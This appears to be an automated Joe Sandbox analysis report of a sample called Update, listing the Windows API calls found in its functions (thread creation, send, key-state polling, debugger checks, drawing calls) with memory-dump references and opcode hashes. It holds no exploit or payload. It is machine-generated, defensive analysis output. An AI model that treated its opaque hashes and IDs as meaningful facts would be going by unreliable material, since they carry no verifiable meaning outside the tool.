                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: CurrentThread
                                              • String ID:
                                              • API String ID: 2882836952-0
                                              • Opcode ID: aaf3e0f0d0f8f1f3a4ac2f5b8bd5fab41d3eaa100fa15abfee4d2d644b7fd40f
                                              • Instruction ID: 723c430d69d621f95a846468934f8435ff5600678504d51602c72318876ab3a6
                                              • Opcode Fuzzy Hash: aaf3e0f0d0f8f1f3a4ac2f5b8bd5fab41d3eaa100fa15abfee4d2d644b7fd40f
                                              • Instruction Fuzzy Hash: B9D012B8104910C7E310DB50C4C465EB2E1FF58300F30C519E92D8B615C738F8C18652
                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 10020693
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: 13c8da13fabdb43a0039df29cdbc36604e7b86c2d4870efbc9606bf7f6935c8f
                                              • Instruction ID: caee183b5a6c68c45fee89ce5ab94ef9cb690e012967d693a85690ee7ea4d081
                                              • Opcode Fuzzy Hash: 13c8da13fabdb43a0039df29cdbc36604e7b86c2d4870efbc9606bf7f6935c8f
                                              • Instruction Fuzzy Hash: 20C04C3424C314E9F430D1442C46B5C1401F75EB65EB543177B205E4D74D7040C13553
                                              APIs
                                              • TCGamerUpdateMain.UPDATE(?,?), ref: 0022100B
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3548588453.0000000000221000.00000020.00000001.01000000.00000005.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000003.00000002.3548541401.0000000000220000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000003.00000002.3548624115.0000000000222000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000003.00000002.3548649924.0000000000223000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000003.00000002.3548676740.0000000000224000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000003.00000002.3548676740.0000000000266000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_220000_Update.jbxd
                                              Similarity
                                              • API ID: GamerMainUpdate
                                              • String ID:
                                              • API String ID: 3533789159-0
                                              • Opcode ID: 0dc032e54f475a4c8a862538ffc73d883b9d6e7095286aea5a65631e74e2db75
                                              • Instruction ID: aa768e360cfd845bcc812d86029c720f5d7cb1a33b10d9dd108669b37e7c815e
                                              • Opcode Fuzzy Hash: 0dc032e54f475a4c8a862538ffc73d883b9d6e7095286aea5a65631e74e2db75
                                              • Instruction Fuzzy Hash: A4B092B656020C7B8B44EAD8EC42D9A339C5A58650B408014BE0C8B241E936FAA08BA1
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 6C1CC50D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: DeleteObject
                                              • String ID:
                                              • API String ID: 1531683806-0
                                              • Opcode ID: edabca67583d93088af5186660f361258d6c176341b0b7258dfb75839eb6e7eb
                                              • Instruction ID: 8a01e00d1338c1d7ee701adb581d47c8c405e9d945077687b7a6508dea232c72
                                              • Opcode Fuzzy Hash: edabca67583d93088af5186660f361258d6c176341b0b7258dfb75839eb6e7eb
                                              • Instruction Fuzzy Hash: 61B092B0B02104EEDE007671C61C31A39686B6230EF04D894B006C5941DB3D84058602
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: send
                                              • String ID:
                                              • API String ID: 2809346765-0
                                              • Opcode ID: b133ea7d05f53c3c11ad6334d0588478f261473ccb87b5617e28918120fa56af
                                              • Instruction ID: 6b957aef4a72e5dc30e8cb3213a85d60c43ac51bc1e09057d618b7ba0e2fc2ae
                                              • Opcode Fuzzy Hash: b133ea7d05f53c3c11ad6334d0588478f261473ccb87b5617e28918120fa56af
                                              • Instruction Fuzzy Hash: 8D900238288511FAA2124A2158897593654D6145423185418DC02C9010D631C2806514
                                              APIs
                                              • Sleep.KERNEL32 ref: 10005EB2
                                                • Part of subcall function 10006F17: _malloc.LIBCMT ref: 10006F31
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: Sleep_malloc
                                              • String ID:
                                              • API String ID: 617756273-0
                                              • Opcode ID: bd1a2801bd1f1b37b244e82fcf0364694be79379b717d5536a6d8ec7b8dccb93
                                              • Instruction ID: c703cf204976232012e29921027dce2d5ea17eb50e6b597cbfa29dc34b4da51f
                                              • Opcode Fuzzy Hash: bd1a2801bd1f1b37b244e82fcf0364694be79379b717d5536a6d8ec7b8dccb93
                                              • Instruction Fuzzy Hash: 6CD0A772D08202CBE7B0EDD048C403D6052A758284F74803DD6059D001D5718D849382
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: 8a98d648b0dbbbca9a833132a4c133eae0ba18741bbd82bdbfd709c827387e5a
                                              • Instruction ID: 31e40b002f12aea9828d400b5d369980443752a57f3c7b0233bbb28abad1cd48
                                              • Opcode Fuzzy Hash: 8a98d648b0dbbbca9a833132a4c133eae0ba18741bbd82bdbfd709c827387e5a
                                              • Instruction Fuzzy Hash: CBA002B1752108565B045774580E88675E95FAA713B4194217312C9044EA7441909765
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C200D9A
                                              • GetParent.USER32(?), ref: 6C200DFF
                                              • GetParent.USER32(?), ref: 6C200E1F
                                              • UpdateWindow.USER32(?), ref: 6C200E70
                                              • SetCursor.USER32(?,?,?), ref: 6C200EAE
                                              • GetAsyncKeyState.USER32(00000012), ref: 6C200F26
                                              • InvalidateRect.USER32(?,?,00000001,?), ref: 6C20101D
                                              • InflateRect.USER32(?,00000000,?), ref: 6C201063
                                              • RedrawWindow.USER32(?,?,00000000,00000401), ref: 6C201076
                                              • InflateRect.USER32(?,00000000,?), ref: 6C20118B
                                              • InvalidateRect.USER32(?,?,00000001,?), ref: 6C201139
                                                • Part of subcall function 6C1FC10A: InvalidateRect.USER32(?,?,00000001,?), ref: 6C1FC181
                                                • Part of subcall function 6C1FC10A: InflateRect.USER32(?,00000000,?), ref: 6C1FC1C7
                                                • Part of subcall function 6C1FC10A: RedrawWindow.USER32(?,?,00000000,00000401), ref: 6C1FC1DB
                                              • RedrawWindow.USER32(?,00000000,00000000,00000505,00000000,00000000,?,00000000), ref: 6C201731
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Rect$Window$InflateInvalidateRedraw$Parent$AsyncCursorH_prolog3_StateUpdate
                                              • String ID:
                                              • API String ID: 3159160173-0
                                              • Opcode ID: d07d657b7bf4f6f10e53178dd3eac598aaf027335ead233e94f954f7aed77882
                                              • Instruction ID: c7ce25ba0de2aa554f657f8f3494f7497cecbebbe026ec6055e0db9a38dc0e89
                                              • Opcode Fuzzy Hash: d07d657b7bf4f6f10e53178dd3eac598aaf027335ead233e94f954f7aed77882
                                              • Instruction Fuzzy Hash: 97527231B0161ADFDF09DF64C858BADBBB5BF4A319F14021AF816A7690DB30A855CF90
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C27CAD5
                                              • CreateCompatibleDC.GDI32(00000000), ref: 6C27CB5B
                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C27CB92
                                              • SelectObject.GDI32(?,00000000), ref: 6C27CBF1
                                              • BitBlt.GDI32(?,00000000,00000000,?,?,00000001,?,?,00CC0020), ref: 6C27CC19
                                              • MulDiv.KERNEL32(?,?,00000064), ref: 6C27CE0B
                                              • MulDiv.KERNEL32(?,?,00000064), ref: 6C27CE26
                                              • MulDiv.KERNEL32(?,?,00000064), ref: 6C27CE42
                                              • MulDiv.KERNEL32(?,?,00000064), ref: 6C27CE5D
                                              • MulDiv.KERNEL32(?,?,00000064), ref: 6C27CE76
                                              • MulDiv.KERNEL32(?,?,00000064), ref: 6C27CE90
                                              • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 6C27CEEF
                                              • DeleteObject.GDI32(?), ref: 6C27CF06
                                                • Part of subcall function 6C24DFF7: FillRect.USER32(00000001,?,-000000A8), ref: 6C24E013
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CompatibleCreateObject$BitmapDeleteFillH_prolog3RectSelect
                                              • String ID:
                                              • API String ID: 3910664508-0
                                              • Opcode ID: ae823813d857626bd1516121643001a1e4b46e8dc9a3fa1ff42edbb3334c9913
                                              • Instruction ID: 9b19e830d4589d07dc312423ac39c80baf021db336c0464489689a3a00e492c1
                                              • Opcode Fuzzy Hash: ae823813d857626bd1516121643001a1e4b46e8dc9a3fa1ff42edbb3334c9913
                                              • Instruction Fuzzy Hash: 5BD19D71A0022A9FDF14DFB9C994AAE7BB4EF49715F10412AF946E7780CB34D905CBA0
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(?,2000000B,6C32E9BB,00000002,00000000,?,?,?,6C32E9BB,?,00000000), ref: 6C32F083
                                              • GetLocaleInfoW.KERNEL32(?,20001004,6C32E9BB,00000002,00000000,?,?,?,6C32E9BB,?,00000000), ref: 6C32F0AC
                                              • GetACP.KERNEL32(?,?,6C32E9BB,?,00000000), ref: 6C32F0C1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID: ACP$OCP
                                              • API String ID: 2299586839-711371036
                                              • Opcode ID: 28ed86b64be57f1d24ca50d92afd24a8854fd555ebca7618dcf6cc7cb064ae3b
                                              • Instruction ID: 96c9815e3d70381f748ee185d059eabaab627d164b925b36954dfe90578ae2e7
                                              • Opcode Fuzzy Hash: 28ed86b64be57f1d24ca50d92afd24a8854fd555ebca7618dcf6cc7cb064ae3b
                                              • Instruction Fuzzy Hash: 4821C172605121AAEF248F65C900ACBF3BAAB48F6CB16C524E905C7A00F737DA41CF60
                                              APIs
                                                • Part of subcall function 6C322643: GetLastError.KERNEL32(00000000,?,6C3269BA), ref: 6C322647
                                                • Part of subcall function 6C322643: SetLastError.KERNEL32(00000000,?,?,00000028,6C31D5FE), ref: 6C3226E9
                                              • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 6C32E98D
                                              • IsValidCodePage.KERNEL32(00000000), ref: 6C32E9CB
                                              • IsValidLocale.KERNEL32(?,00000001), ref: 6C32E9DE
                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6C32EA26
                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6C32EA41
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                              • String ID:
                                              • API String ID: 415426439-0
                                              • Opcode ID: facd7938f497944d835f6dd9d410ecef5d38bc73a6168a1c4adb6e3c73804c3b
                                              • Instruction ID: 1c930a0f56283f0324544f136445209bbfa8c5d24ce09daefa399b6273c9cca7
                                              • Opcode Fuzzy Hash: facd7938f497944d835f6dd9d410ecef5d38bc73a6168a1c4adb6e3c73804c3b
                                              • Instruction Fuzzy Hash: B7517171A01705AEEF10DFB5CC41AEE77B8BF0670AF10442AE560E7690D7799604CFA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Parent$H_prolog3Iconic
                                              • String ID:
                                              • API String ID: 881905488-0
                                              • Opcode ID: 25aadc22251349bc90725bc7a6799ca4f5439dad302c8200fc32a661f069e1a0
                                              • Instruction ID: f6f6b90212128b80866065bf2e6ca07526d0c16f8ca9cadb47a36bc8cf7bac8c
                                              • Opcode Fuzzy Hash: 25aadc22251349bc90725bc7a6799ca4f5439dad302c8200fc32a661f069e1a0
                                              • Instruction Fuzzy Hash: CF219A32600A09ABDF12AFA4CC14BAE7BB6BF49318F054125FD06D6A10DB74D824DB91
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 6C1E6AE2
                                              • IsDebuggerPresent.KERNEL32 ref: 6C1E6BAE
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C1E6BC7
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 6C1E6BD1
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                              • String ID:
                                              • API String ID: 254469556-0
                                              • Opcode ID: 2c7be22311869dd1dfb0c2cda577c3eba387eababee013333de7bef5e3e28d12
                                              • Instruction ID: 19f9f5868a08a90afae8258df85ca97786eb6e22c44ce2bc7affdcab288decda
                                              • Opcode Fuzzy Hash: 2c7be22311869dd1dfb0c2cda577c3eba387eababee013333de7bef5e3e28d12
                                              • Instruction Fuzzy Hash: 2F31D7B5E0562C9BDF21DFA4C9497CDBBB8BF08304F5041AAE50DAB240EB719A84CF45
                                              APIs
                                                • Part of subcall function 6C1E4E48: GetWindowLongW.USER32(?,000000F0), ref: 6C1E4E55
                                              • GetKeyState.USER32(00000010), ref: 6C1D64BF
                                              • GetKeyState.USER32(00000011), ref: 6C1D64CC
                                              • GetKeyState.USER32(00000012), ref: 6C1D64D9
                                              • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6C1D64F3
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: State$LongMessageSendWindow
                                              • String ID:
                                              • API String ID: 1063413437-0
                                              • Opcode ID: f89d663c906b26c8b9732e8faa6759764b48b7cd9f56b4bd6c894583229f828f
                                              • Instruction ID: db902c9dcf1c9d41ce6c8c5dca8b051c08002e8aa5fceb758ecbc52d0d9dff6e
                                              • Opcode Fuzzy Hash: f89d663c906b26c8b9732e8faa6759764b48b7cd9f56b4bd6c894583229f828f
                                              • Instruction Fuzzy Hash: 1FF0E93634220E37FE1026308C48BEA36395F02B4BF164934A903EA9C0CF50D4515360
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID: pt4l
                                              • API String ID: 431132790-3870122376
                                              • Opcode ID: 3e32caccfab3985724ad8c969ff6dd242a962899d796bd8b7801d962982cdf6c
                                              • Instruction ID: 527f0260098016a6928b8a57021769d5040ae258fd85499dd90c75f644d3c9d5
                                              • Opcode Fuzzy Hash: 3e32caccfab3985724ad8c969ff6dd242a962899d796bd8b7801d962982cdf6c
                                              • Instruction Fuzzy Hash: F9E18C31A002099BDF04CF64C854BAEBBB6BF49308F16455AE816EBB94DB34E941CB91
                                              APIs
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,6C1E5BE4), ref: 6C31AFD5
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,6C1E5BE4), ref: 6C31AFDF
                                              • UnhandledExceptionFilter.KERNEL32(6C1B1FA2,?,?,?,?,?,6C1E5BE4), ref: 6C31AFEC
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: 32e2c9219a4baac279eec030e58935e28d56a1fc1e5a0e4b1368024c0ba5b83e
                                              • Instruction ID: 1d0209674b828876f6ab4e4a282db4d88855899f50ffa58a5fe42ba71fd26476
                                              • Opcode Fuzzy Hash: 32e2c9219a4baac279eec030e58935e28d56a1fc1e5a0e4b1368024c0ba5b83e
                                              • Instruction Fuzzy Hash: 4A31C5B590122CABCB21DF28D9887CDBBB8BF48314F5042DAE41CA7250E7709B858F45
                                              APIs
                                              • GetKeyState.USER32(00000010), ref: 6C25CE46
                                              • GetKeyState.USER32(00000011), ref: 6C25CE53
                                              • GetKeyState.USER32(00000012), ref: 6C25CE60
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
